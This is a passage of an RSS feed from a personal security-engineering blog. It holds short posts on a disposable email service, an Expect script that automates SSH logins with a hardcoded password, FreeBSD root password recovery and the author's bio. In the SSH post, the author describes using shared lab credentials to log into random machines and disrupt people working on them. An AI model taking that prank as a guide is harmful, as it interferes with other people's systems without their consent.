in order to run nicely with xmonad.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Introducing Pepbot</title>
      <link>https://cloudberry.engineering/article/introducing-pepbot/</link>
      <pubDate>Thu, 25 Nov 2010 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/article/introducing-pepbot/</guid>
      <description>&lt;p&gt;Introducing my new little creature just released in the wild:&#xA;&lt;a href=&#34;http://pepbot.com&#34;&gt;Pepbot&lt;/a&gt;.&lt;/p&gt;&#xA;&lt;h2 id=&#34;what&#34;&gt;What?&lt;/h2&gt;&#xA;&lt;p&gt;It&amp;rsquo;s a disposable temporary email service. His main goal is to help&#xA;you dodge spam by providing a valid throw away mail address you can&#xA;use instead of your real one. For example when you want to leave a&#xA;comment on a shady blog, register to a random forum or whatever else.&lt;/p&gt;&#xA;&lt;p&gt;When prompted for a valid mail simply use &lt;code&gt;whatever@pepbot.com&lt;/code&gt;&#xA;then go to Pepbot and check your mail or forget about it.&lt;/p&gt;</description>
    </item>
    <item>
      <title>How To Automate SSH With Expect</title>
      <link>https://cloudberry.engineering/note/how-to-automate-ssh-with-expect/</link>
      <pubDate>Wed, 17 Nov 2010 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/note/how-to-automate-ssh-with-expect/</guid>
      <description>&lt;p&gt;Another useful snippet of code to automate SSH with expect:&lt;/p&gt;&#xA;&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#272822;background-color:#fafafa;-moz-tab-size:4;-o-tab-size:4;tab-size:4;&#34;&gt;&lt;code class=&#34;language-bash&#34; data-lang=&#34;bash&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#75715e&#34;&gt;#!/usr/bin/expect&#xA;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#75715e&#34;&gt;&lt;/span&gt;spawn ssh user@host whatever&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;expect &lt;span style=&#34;color:#d88200&#34;&gt;&amp;#34;*?assword:*&amp;#34;&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;send -- &lt;span style=&#34;color:#d88200&#34;&gt;&amp;#34;password\r&amp;#34;&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;send -- &lt;span style=&#34;color:#d88200&#34;&gt;&amp;#34;\r&amp;#34;&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;I used it with dynamic SSH connection detection in &lt;code&gt;.profile&lt;/code&gt;.&lt;/p&gt;&#xA;&lt;p&gt;In a lab I am using every machine has the same unprivileged user&#xA;authenticated with the same password. And SSH is open.&lt;/p&gt;&#xA;&lt;p&gt;You can guess the popular game: connect to random machines and mess things&#xA;up while someone is working on them.&lt;/p&gt;</description>
    </item>
    <item>
      <title>FreeBSD Root Password Recover</title>
      <link>https://cloudberry.engineering/note/freebsd-root-password-recover/</link>
      <pubDate>Sat, 16 Oct 2010 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/note/freebsd-root-password-recover/</guid>
      <description>&lt;p&gt;Never locked out again from my FreeBSD virtual machine for having forget the root&#xA;password.&lt;/p&gt;&#xA;&lt;p&gt;The fix:&lt;/p&gt;&#xA;&lt;ol&gt;&#xA;&lt;li&gt;Boot in single user mode&lt;/li&gt;&#xA;&lt;li&gt;Remount the &lt;code&gt;/&lt;/code&gt; file system in read and write mode with &lt;code&gt;mount -u /&lt;/code&gt; and&#xA;then &lt;code&gt;mount -a&lt;/code&gt;&lt;/li&gt;&#xA;&lt;li&gt;Setup the new password by &lt;code&gt;passwd&lt;/code&gt;&lt;/li&gt;&#xA;&lt;li&gt;Boot in multi-user mode with &lt;code&gt;exit&lt;/code&gt;&lt;/li&gt;&#xA;&lt;li&gt;???&lt;/li&gt;&#xA;&lt;li&gt;Profit!&lt;/li&gt;&#xA;&lt;/ol&gt;&#xA;&lt;p&gt;Pheww.&lt;/p&gt;&#xA;&lt;p&gt;I needed to save this tip somewhere because I know I will forget root&#xA;password again.&lt;/p&gt;</description>
    </item>
    <item>
      <title>About</title>
      <link>https://cloudberry.engineering/about/</link>
      <pubDate>Mon, 01 Jan 0001 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/about/</guid>
      <description>&lt;p&gt;Hi,&#xA;my name is Gianluca Brindisi.&lt;/p&gt;&#xA;&lt;p&gt;I am a security engineer specialized in &lt;strong&gt;cloud &amp;amp; AI security&lt;/strong&gt;, currently working at &lt;strong&gt;&lt;a href=&#34;https://synthesia.io&#34;&gt;Synthesia&lt;/a&gt;&lt;/strong&gt; wrestling with the security challenges of AI.&lt;/p&gt;&#xA;&lt;p&gt;Previously I was the &lt;strong&gt;product security&lt;/strong&gt; lead engineer for &lt;strong&gt;Docker&lt;/strong&gt;’s Trust and AI groups. Before that I spent much of my career at &lt;strong&gt;Spotify&lt;/strong&gt;, joining during &lt;a href=&#34;https://techcrunch.com/2016/02/23/spotify-announces-google-cloud-platform-partnership&#34;&gt;their transition&lt;/a&gt; to &lt;strong&gt;Google Cloud Platform&lt;/strong&gt; (GCP), contributed to scale the security organization and eventually leading the &lt;strong&gt;cloud security&lt;/strong&gt; team. Along the way I contributed &lt;a href=&#34;https://github.com/spotify/gcp-audit&#34;&gt;open&lt;/a&gt; &lt;a href=&#34;https://github.com/spotify/gcp-firewall-enforcer&#34;&gt;source&lt;/a&gt; &lt;a href=&#34;https://forsetisecurity.org&#34;&gt;projects&lt;/a&gt;, &lt;a href=&#34;https://www.googblogs.com/with-forseti-spotify-and-google-release-gcp-security-tools-to-open-source-community/&#34;&gt;articles&lt;/a&gt; and spoke &lt;a href=&#34;https://www.troopers.de/troopers19/agenda/bpnbqm/&#34;&gt;at events&lt;/a&gt;.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Subscribe</title>
      <link>https://cloudberry.engineering/subscribe/</link>
      <pubDate>Mon, 01 Jan 0001 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/subscribe/</guid>
      <description>&lt;p&gt;You can subscribe to the &lt;a href=&#34;https://cloudberry.engineering/index.xml&#34;&gt;articles feed&lt;/a&gt; or to the newsletter.&lt;/p&gt;</description>
    </item>
  </channel>
</rss>
